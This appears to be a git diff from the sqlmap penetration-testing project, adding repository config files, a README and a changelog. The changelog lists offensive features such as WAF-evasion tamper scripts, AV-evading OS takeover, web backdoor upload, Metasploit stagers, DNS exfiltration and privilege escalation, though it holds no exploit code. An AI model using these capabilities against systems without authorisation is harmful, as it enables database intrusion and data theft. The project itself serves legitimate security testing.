1704c73892 | ||
|
|
a654a426ef | ||
|
|
156fdd96ef | ||
|
|
e774578180 | ||
|
|
49aa1ae542 | ||
|
|
759b720425 | ||
|
|
415d5f2b44 | ||
|
|
f941159f81 | ||
|
|
5d792feffd | ||
|
|
ddd8b277a6 | ||
|
|
2f452480b3 | ||
|
|
0acef530ce | ||
|
|
aa62465aad | ||
|
|
c93e265269 | ||
|
|
8076984f69 | ||
|
|
8567ad8f3e | ||
|
|
dd3f65f0fb | ||
|
|
f53ef947f1 | ||
|
|
694356821d | ||
|
|
42f53f380f | ||
|
|
1f2a1bb24c | ||
|
|
8c68d25b39 | ||
|
|
66c9885b96 | ||
|
|
38a37b89f6 | ||
|
|
89e919f07a | ||
|
|
5ebf572cae | ||
|
|
dee15ed0b0 | ||
|
|
9ba01c94d3 | ||
|
|
98496fd173 | ||
|
|
404927d04a | ||
|
|
e4c34ff86c | ||
|
|
d95a8850c8 | ||
|
|
0913d700a8 | ||
|
|
a10adcfe08 | ||
|
|
4a3fa69f9d | ||
|
|
3721451cd6 | ||
|
|
8f47b1a524 | ||
|
|
2553318464 | ||
|
|
0df5b5fed9 | ||
|
|
a0f5c3d885 | ||
|
|
3e152f8b20 | ||
|
|
28d5248c04 | ||
|
|
24d3e24db0 | ||
|
|
b558712a47 | ||
|
|
15d1fcbb7f | ||
|
|
bad2acdcb9 | ||
|
|
2cafd5697b | ||
|
|
858cb25975 | ||
|
|
0795e1164d | ||
|
|
4bea0e343a | ||
|
|
8f26f30740 | ||
|
|
ad0def7604 | ||
|
|
7e5a980f1b | ||
|
|
ccec743ba1 | ||
|
|
e05785fef6 | ||
|
|
16edd18a03 | ||
|
|
60366f7168 | ||
|
|
9c014c0fd0 | ||
|
|
2a07af2294 | ||
|
|
0debc95ad4 | ||
|
|
3c34066d19 | ||
|
|
af1d9f129c | ||
|
|
d1e3596382 | ||
|
|
6267e74bfb | ||
|
|
b28aeef8ff | ||
|
|
3fea964538 | ||
|
|
16599cf2cf | ||
|
|
0ed5ba5559 | ||
|
|
c4951fd631 | ||
|
|
b5deab1e43 | ||
|
|
6db0905137 | ||
|
|
1d55923c9d | ||
|
|
8131f9c77c | ||
|
|
7e0c411c0e | ||
|
|
dc06b40ddc | ||
|
|
89dc99188d | ||
|
|
f728208ff7 | ||
|
|
cef248a5ea | ||
|
|
203cfd114f | ||
|
|
8e8f6f842c | ||
|
|
00a23ace9a | ||
|
|
542b01993e | ||
|
|
a6674edf8a | ||
|
|
6a5a5d55f2 | ||
|
|
212cd828d6 | ||
|
|
bc0eb880df | ||
|
|
4e6af8d6c9 | ||
|
|
5c92fad5dc | ||
|
|
b08a4efb4b | ||
|
|
22995787d1 | ||
|
|
d291464cd4 | ||
|
|
dbd52c52e4 | ||
|
|
ec63fc4036 | ||
|
|
a1e80e77a1 | ||
|
|
87239476af | ||
|
|
e4699f389d | ||
|
|
ea045eaa2f | ||
|
|
7c88e32f9d | ||
|
|
565433097e | ||
|
|
494e014a4a | ||
|
|
8b0d31a6b7 | ||
|
|
894b9f0f80 | ||
|
|
25f1a9c7d0 | ||
|
|
87c8bdbc29 | ||
|
|
c74b920f54 | ||
|
|
950dba5139 | ||
|
|
9ed0744510 | ||
|
|
267cf5dd1a | ||
|
|
7faefcca88 | ||
|
|
979c919dc7 | ||
|
|
e8b0fd90c8 | ||
|
|
767c67e37a | ||
|
|
c20b196518 | ||
|
|
061794650f | ||
|
|
92817159dc | ||
|
|
200518724c | ||
|
|
7b8316728c | ||
|
|
c6cae7da41 | ||
|
|
144dc1b8c4 | ||
|
|
6f5d2ed171 | ||
|
|
a2077bfc0e | ||
|
|
732ed48e2b | ||
|
|
dcbbad642d | ||
|
|
f6b447f6e7 | ||
|
|
a20bbc3974 | ||
|
|
645afee359 | ||
|
|
921e449454 | ||
|
|
4559ded6c1 | ||
|
|
f4b8ce5c72 | ||
|
|
00002eeb38 | ||
|
|
d0acb1c5a3 | ||
|
|
f8056f4098 | ||
|
|
a0eabb6719 | ||
|
|
8a8dc73980 | ||
|
|
1d15c595a4 | ||
|
|
e63428207c | ||
|
|
f91687c4f7 | ||
|
|
6966c235a4 | ||
|
|
93b7994c0c | ||
|
|
a78bf9a88b | ||
|
|
6437c16156 | ||
|
|
a97e20d8e1 | ||
|
|
3197fada59 | ||
|
|
952c280083 | ||
|
|
e689c2ec99 | ||
|
|
44a74ccee8 | ||
|
|
b183b9cbb4 | ||
|
|
a4d8234875 | ||
|
|
98205cc488 | ||
|
|
39652bfbf4 | ||
|
|
97840535c6 | ||
|
|
49146e573a | ||
|
|
574880ba73 | ||
|
|
b4ce8fe361 | ||
|
|
e4bd0eb92d | ||
|
|
5c58747740 | ||
|
|
051db588a5 | ||
|
|
44adbc5776 | ||
|
|
2825ab5e4e | ||
|
|
c18a5cb92f | ||
|
|
f337cd6e0a | ||
|
|
6d697d60b2 | ||
|
|
4ce3abc56d | ||
|
|
1a764e1f08 | ||
|
|
5f171340f5 | ||
|
|
dcf0b2a3c1 | ||
|
|
f5c422efb4 | ||
|
|
505647b00f | ||
|
|
c4215ce8d2 | ||
|
|
26c7b74e65 | ||
|
|
1d968f51e9 | ||
|
|
c9863bc1d2 | ||
|
|
070ccc30e9 | ||
|
|
1febdcac9b | ||
|
|
d4d26b59eb | ||
|
|
746cbdba96 | ||
|
|
1100b37feb | ||
|
|
2915b5d7e9 | ||
|
|
625cc5cc0d | ||
|
|
b4ddfe8333 | ||
|
|
50bbb0cf8a | ||
|
|
9c9988c375 | ||
|
|
055b14a11a | ||
|
|
0ad43952bd | ||
|
|
f9f418b479 | ||
|
|
3434a22872 | ||
|
|
a193205323 | ||
|
|
8817b2884f | ||
|
|
a58b36fe07 | ||
|
|
4a72ad113a | ||
|
|
c7e1649655 | ||
|
|
3a9f685e18 | ||
|
|
df36eb6d11 | ||
|
|
4512ef56d1 | ||
|
|
80bd146696 | ||
|
|
e5dc3f51c8 | ||
|
|
6c1b31d93c | ||
|
|
ef1180c3c2 | ||
|
|
12f371cd65 | ||
|
|
dc04fa7f06 | ||
|
|
d58ba7ee6d | ||
|
|
f316e722c1 | ||
|
|
6a62a78b0a | ||
|
|
067cc07fb9 | ||
|
|
5c20462155 | ||
|
|
82222fcd3a | ||
|
|
d07f60578c | ||
|
|
80df1fdcf9 | ||
|
|
954a927cee | ||
|
|
71547a3496 | ||
|
|
bb61010a45 | ||
|
|
473024bd6e | ||
|
|
6319eb6e5c | ||
|
|
232f927dd0 | ||
|
|
d71e47ce56 | ||
|
|
2eb24c6368 | ||
|
|
236ca9b952 | ||
|
|
96a033b51d | ||
|
|
d5b1863dec | ||
|
|
ce022a3b6e | ||
|
|
d55175a340 | ||
|
|
9c620da0a5 | ||
|
|
c1c14dabd9 | ||
|
|
e6c4154cac | ||
|
|
e4e081cdc6 | ||
|
|
a605980d66 | ||
|
|
b363f1c5ab | ||
|
|
e28b98a366 | ||
|
|
c332c72808 | ||
|
|
6e36a6f8ed | ||
|
|
4779a5fe0f | ||
|
|
1bf6a7cadc | ||
|
|
aa14bea051 | ||
|
|
e518ae82e4 | ||
|
|
bfd8128693 | ||
|
|
de68a499f5 | ||
|
|
bb123b2769 | ||
|
|
f1a7d095aa | ||
|
|
89c43893d4 | ||
|
|
458d59416c | ||
|
|
14578a7a4d | ||
|
|
17289c5ff2 | ||
|
|
e608a5ca55 | ||
|
|
19c6804ded | ||
|
|
2c98c11e80 | ||
|
|
45e3ce798f | ||
|
|
d905e5ef9f | ||
|
|
576cc97742 | ||
|
|
b2b2ec8a26 | ||
|
|
3d4bfb3263 | ||
|
|
b4fd71e8b9 | ||
|
|
8096a37940 | ||
|
|
cb3d2bac16 | ||
|
|
516fdb9356 | ||
|
|
24a3a23159 | ||
|
|
4b622ed860 | ||
|
|
0fc4587f02 | ||
|
|
ba2e009fd9 | ||
|
|
bc31bd1dd9 | ||
|
|
fd7de4bbb8 | ||
|
|
3b9303186e | ||
|
|
e5a01d500e | ||
|
|
32067cb676 | ||
|
|
03a6739fbf | ||
|
|
150abc0f1e | ||
|
|
3bca0d4b28 | ||
|
|
5ac2b0658c | ||
|
|
cfd8a83655 | ||
|
|
966f34f381 | ||
|
|
c7b72abc0e | ||
|
|
02f6425db8 | ||
|
|
93ee4a01e5 | ||
|
|
81d1a767ac | ||
|
|
8e7282f7c7 | ||
|
|
440a52b84d | ||
|
|
37d3b3adda | ||
|
|
13de8366d0 | ||
|
|
f7ee4d578e | ||
|
|
ef3846e0de | ||
|
|
45dff4a00a | ||
|
|
b463205544 | ||
|
|
06cc2a6d70 | ||
|
|
a727427299 | ||
|
|
c5d20b8a86 | ||
|
|
f3e8d6db70 | ||
|
|
ccedadd780 | ||
|
|
e8c115500d | ||
|
|
722ca8bf2f | ||
|
|
57b8bb4c8e | ||
|
|
58f3eee390 | ||
|
|
1d7de719b9 | ||
|
|
16b4530bbe | ||
|
|
5121a4dcba | ||
|
|
406d5df195 | ||
|
|
546a6c32e3 | ||
|
|
6f4035938b | ||
|
|
06e8546177 | ||
|
|
eeb34eb028 | ||
|
|
4ce74764b7 | ||
|
|
aec2419410 | ||
|
|
1af6898618 | ||
|
|
69259c5984 | ||
|
|
8e88b32274 | ||
|
|
aefa7ef988 | ||
|
|
8c0ac767f4 | ||
|
|
b997df740a | ||
|
|
0c1a6b3edf | ||
|
|
2efee058ea | ||
|
|
954417072b | ||
|
|
ba00a17205 | ||
|
|
2355885712 | ||
|
|
207e96e2b2 | ||
|
|
c405fb51ab | ||
|
|
b12d955274 | ||
|
|
770e000cb4 | ||
|
|
9ab174a444 | ||
|
|
77d9d22ceb | ||
|
|
dded57f1cd | ||
|
|
ad03684788 | ||
|
|
6054090191 | ||
|
|
a8d57bb031 | ||
|
|
193482a62b | ||
|
|
981c7a4428 | ||
|
|
793c323b2a | ||
|
|
d54a51a328 | ||
|
|
69204afe1f | ||
|
|
9631dc115e | ||
|
|
ae0f1985f3 | ||
|
|
deeccf9b5e | ||
|
|
1c5925ea2b | ||
|
|
7adbf5892d | ||
|
|
c25b49e80e | ||
|
|
96db179ffe | ||
|
|
f91843540f | ||
|
|
8f973ce574 | ||
|
|
161590e121 | ||
|
|
6690b4c00a | ||
|
|
bc3b4c6936 | ||
|
|
fd7cb9101c | ||
|
|
bc448211c5 | ||
|
|
73e713c5ba | ||
|
|
26cb082fc3 | ||
|
|
de393628d0 | ||
|
|
5560f0b68a | ||
|
|
92645dd264 | ||
|
|
9b0f11f879 | ||
|
|
e10ab5aa0e | ||
|
|
9c125a2b57 | ||
|
|
6ff8feb5cf | ||
|
|
d0604ef513 | ||
|
|
2d87a3349f | ||
|
|
9c42a883be | ||
|
|
2cc3bb2f6a | ||
|
|
9e0d890171 | ||
|
|
c1010c20d8 | ||
|
|
a4d62af2ea | ||
|
|
9340bf59fb | ||
|
|
0e9873fd4f | ||
|
|
c83593c044 | ||
|
|
24ddbdc89d | ||
|
|
b0ad102efb | ||
|
|
79c8d63b88 | ||
|
|
64bb57d786 | ||
|
|
1f7810e46a | ||
|
|
064029cb2d | ||
|
|
04c187c66a | ||
|
|
2f406b3e56 | ||
|
|
c05f600e90 | ||
|
|
4ae464c80d | ||
|
|
f92b76a8b0 | ||
|
|
374b9ba878 | ||
|
|
35708a0b97 | ||
|
|
996a872e51 | ||
|
|
c18efe5084 | ||
|
|
8d06975142 | ||
|
|
7e8ac16245 | ||
|
|
ad228e6947 |
14
.gitattributes
vendored
Normal file
14
.gitattributes
vendored
Normal file
@@ -0,0 +1,14 @@
|
|||||||
|
*.py text eol=lf
|
||||||
|
*.conf text eol=lf
|
||||||
|
|
||||||
|
*_ binary
|
||||||
|
*.dll binary
|
||||||
|
*.pdf binary
|
||||||
|
*.so binary
|
||||||
|
*.wav binary
|
||||||
|
*.zip binary
|
||||||
|
*.x32 binary
|
||||||
|
*.x64 binary
|
||||||
|
*.exe binary
|
||||||
|
*.sln binary
|
||||||
|
*.vcproj binary
|
||||||
5
.gitignore
vendored
Normal file
5
.gitignore
vendored
Normal file
@@ -0,0 +1,5 @@
|
|||||||
|
*.py[cod]
|
||||||
|
output/
|
||||||
|
.sqlmap_history
|
||||||
|
traffic.txt
|
||||||
|
*~
|
||||||
6
.travis.yml
Normal file
6
.travis.yml
Normal file
@@ -0,0 +1,6 @@
|
|||||||
|
language: python
|
||||||
|
python:
|
||||||
|
- "2.6"
|
||||||
|
- "2.7"
|
||||||
|
script:
|
||||||
|
- python -c "import sqlmap; import sqlmapapi"
|
||||||
65
README.md
Normal file
65
README.md
Normal file
@@ -0,0 +1,65 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
||||||
|
|
||||||
|
Screenshots
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
|
||||||
|
|
||||||
|
Installation
|
||||||
|
----
|
||||||
|
|
||||||
|
You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
|
||||||
|
|
||||||
|
Usage
|
||||||
|
----
|
||||||
|
|
||||||
|
To get a list of basic options and switches use:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
To get a list of all options and switches use:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
You can find a sample run [here](https://asciinema.org/a/46601).
|
||||||
|
To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Links
|
||||||
|
----
|
||||||
|
|
||||||
|
* Homepage: http://sqlmap.org
|
||||||
|
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|
||||||
|
Translations
|
||||||
|
----
|
||||||
|
|
||||||
|
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||||
|
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||||
|
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
||||||
|
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||||
|
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||||
|
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||||
|
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||||
|
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||||
12
doc/AUTHORS
12
doc/AUTHORS
@@ -1,7 +1,7 @@
|
|||||||
Bernardo Damele A. G. (inquis) - project leader, core developer
|
Bernardo Damele Assumpcao Guimaraes (@inquisb)
|
||||||
<bernardo.damele@gmail.com>
|
<bernardo@sqlmap.org>
|
||||||
PGP Key ID: 0x05F5A30F
|
|
||||||
|
|
||||||
Daniele Bellucci (belch) - project founder, initial developer
|
Miroslav Stampar (@stamparm)
|
||||||
<daniele.bellucci@gmail.com>
|
<miroslav@sqlmap.org>
|
||||||
PGP Key ID: 0x9A0E8190
|
|
||||||
|
You can contact both developers by writing to dev@sqlmap.org
|
||||||
|
|||||||
368
doc/CHANGELOG.md
Normal file
368
doc/CHANGELOG.md
Normal file
@@ -0,0 +1,368 @@
|
|||||||
|
# Version 1.0 (2016-02-27)
|
||||||
|
|
||||||
|
* Implemented support for automatic decoding of page content through detected charset.
|
||||||
|
* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
|
||||||
|
* Major improvements to program stabilization based on user reports.
|
||||||
|
* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms.
|
||||||
|
* Fixed major bug with DNS leaking in Tor mode.
|
||||||
|
* Added wordlist compilation made of the most popular cracking dictionaries.
|
||||||
|
* Implemented multi-processor hash cracking routine(s).
|
||||||
|
* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method.
|
||||||
|
* Old resume files are now deprecated and replaced by faster SQLite based session mechanism.
|
||||||
|
* Substantial code optimization and smaller memory footprint.
|
||||||
|
* Added option `-m` for scanning multiple targets enlisted in a given textual file.
|
||||||
|
* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form.
|
||||||
|
* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests.
|
||||||
|
* Added option `--host` for manually setting HTTP Host header value.
|
||||||
|
* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself.
|
||||||
|
* Added option `--skip` for skipping tests for given parameter(s).
|
||||||
|
* Added switch `--titles` for comparing pages based only on their titles.
|
||||||
|
* Added option `--charset` for forcing character encoding used for data retrieval.
|
||||||
|
* Added switch `--check-tor` for checking if Tor is used properly.
|
||||||
|
* Added option `--crawl` for multithreaded crawling of a given website starting from the target url.
|
||||||
|
* Added option `--csv-del` for manually setting delimiting character used in CSV output.
|
||||||
|
* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
|
||||||
|
* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
|
||||||
|
* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection.
|
||||||
|
* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
|
||||||
|
* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
|
||||||
|
* Major improvements to switches `--tables` and `--columns`.
|
||||||
|
* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof.
|
||||||
|
* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header.
|
||||||
|
* Added switch `-a` to enumerate all DBMS data.
|
||||||
|
* Added option `--alert` to run host OS command(s) when SQL injection is found.
|
||||||
|
* Added option `--answers` to set user answers to asked questions during sqlmap run.
|
||||||
|
* Added option `--auth-file` to set HTTP authentication PEM cert/private key file.
|
||||||
|
* Added option `--charset` to force character encoding used during data retrieval.
|
||||||
|
* Added switch `--check-tor` to force checking of proper usage of Tor.
|
||||||
|
* Added option `--code` to set HTTP code to match when query is evaluated to True.
|
||||||
|
* Added option `--cookie-del` to set character to be used while splitting cookie values.
|
||||||
|
* Added option `--crawl` to set the crawling depth for the website starting from the target URL.
|
||||||
|
* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`).
|
||||||
|
* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token.
|
||||||
|
* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token.
|
||||||
|
* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`).
|
||||||
|
* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password).
|
||||||
|
* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies.
|
||||||
|
* Added switch `--disable-coloring` to disable console output coloring.
|
||||||
|
* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s).
|
||||||
|
* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`).
|
||||||
|
* Added option `--eval` for setting the Python code that will be evaluated before the request.
|
||||||
|
* Added switch `--force-ssl` to force usage of SSL/HTTPS.
|
||||||
|
* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval.
|
||||||
|
* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`).
|
||||||
|
* Added switch `-hh` for showing advanced help message.
|
||||||
|
* Added option `--host` to set the HTTP Host header value.
|
||||||
|
* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
|
||||||
|
* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
|
||||||
|
* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection.
|
||||||
|
* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
|
||||||
|
* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
|
||||||
|
* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
|
||||||
|
* Added switch `--invalid-string` for usage of random strings while invalidating values.
|
||||||
|
* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format.
|
||||||
|
* Added option `-m` to set the textual file holding multiple targets for scanning purposes.
|
||||||
|
* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`).
|
||||||
|
* Added switch `--no-cast` for turning off payload casting mechanism.
|
||||||
|
* Added switch `--no-escape` for turning off string escaping mechanism.
|
||||||
|
* Added option `--not-string` for setting string to be matched when query is evaluated to False.
|
||||||
|
* Added switch `--offline` to force work in offline mode (i.e. only use session data).
|
||||||
|
* Added option `--output-dir` to set custom output directory path.
|
||||||
|
* Added option `--param-del` to set character used for splitting parameter values.
|
||||||
|
* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing).
|
||||||
|
* Added option `--proxy-file` to set file holding proxy list.
|
||||||
|
* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory.
|
||||||
|
* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run.
|
||||||
|
* Added option `--safe-post` to set POST data for sending to safe URL.
|
||||||
|
* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.
|
||||||
|
* Added option `--skip` to skip testing of given parameter(s).
|
||||||
|
* Added switch `--skip-static` to skip testing parameters that not appear dynamic.
|
||||||
|
* Added switch `--skip-urlencode` to skip URL encoding of payload data.
|
||||||
|
* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection.
|
||||||
|
* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
|
||||||
|
* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
|
||||||
|
* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
|
||||||
|
* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
|
||||||
|
* Added option `--test-skip` for skiping tests by payloads and/or titles (e.g. `BENCHMARK`).
|
||||||
|
* Added switch `--titles` to turn on comparison of pages based only on their titles.
|
||||||
|
* Added option `--tor-port` to explicitly set Tor proxy port.
|
||||||
|
* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
|
||||||
|
* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection.
|
||||||
|
* Added option `--where` to set `WHERE` condition to be used during the table dumping.
|
||||||
|
* Added option `-X` to exclude DBMS database table column(s) from enumeration.
|
||||||
|
* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing.
|
||||||
|
* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`).
|
||||||
|
|
||||||
|
# Version 0.9 (2011-04-10)
|
||||||
|
|
||||||
|
* Rewritten SQL injection detection engine.
|
||||||
|
* Support to directly connect to the database without passing via a SQL injection, option `-d`.
|
||||||
|
* Added full support for both time-based blind SQL injection and error-based SQL injection techniques.
|
||||||
|
* Implemented support for SQLite 2 and 3.
|
||||||
|
* Implemented support for Firebird.
|
||||||
|
* Implemented support for Microsoft Access, Sybase and SAP MaxDB.
|
||||||
|
* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`.
|
||||||
|
* Added support to tamper injection data with option `--tamper`.
|
||||||
|
* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
|
||||||
|
* Added support to enumerate roles on Oracle, `--roles` switch.
|
||||||
|
* Added support for SOAP based web services requests.
|
||||||
|
* Added support to fetch unicode data.
|
||||||
|
* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`.
|
||||||
|
* Implemented several optimization switches to speed up the exploitation of SQL injections.
|
||||||
|
* Support to test and inject against HTTP Referer header.
|
||||||
|
* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`.
|
||||||
|
* Implemented feature to speedup the enumeration of table names.
|
||||||
|
* Support for customizable HTTP(s) redirections.
|
||||||
|
* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`.
|
||||||
|
* Support to parse and test forms on target url, switch `--forms`.
|
||||||
|
* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL.
|
||||||
|
* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection.
|
||||||
|
* Added safe URL feature, `--safe-url` and `--safe-freq`.
|
||||||
|
* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content.
|
||||||
|
* Implemented few other features and switches.
|
||||||
|
* Over 100 bugs fixed.
|
||||||
|
* Major code refactoring.
|
||||||
|
* User's manual updated.
|
||||||
|
|
||||||
|
# Version 0.8 (2010-03-14)
|
||||||
|
|
||||||
|
* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials.
|
||||||
|
* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table.
|
||||||
|
* Support for takeover features on PostgreSQL 8.4.
|
||||||
|
* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.
|
||||||
|
* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.
|
||||||
|
* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries.
|
||||||
|
* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function.
|
||||||
|
* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5.
|
||||||
|
* Updated active fingerprint for PostgreSQL 8.4.
|
||||||
|
* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`.
|
||||||
|
* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses.
|
||||||
|
* Support for Certificate authentication, `--auth-cert` option added.
|
||||||
|
* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`.
|
||||||
|
* Added option `-r` to load a single HTTP request from a text file.
|
||||||
|
* Added switch `--ignore-proxy` to ignore the system default HTTP proxy.
|
||||||
|
* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`.
|
||||||
|
* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`.
|
||||||
|
* Major bug fix and enhancements to the multi-threading (`--threads`) functionality.
|
||||||
|
* Fixed URL encoding/decoding of GET/POST parameters and Cookie header.
|
||||||
|
* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository.
|
||||||
|
* Major bugs fixed.
|
||||||
|
* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
|
||||||
|
* Major code cleanup.
|
||||||
|
* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware.
|
||||||
|
* Updated user's manual.
|
||||||
|
* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
|
||||||
|
|
||||||
|
# Version 0.8 release candidate (2009-09-21)
|
||||||
|
|
||||||
|
* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection.
|
||||||
|
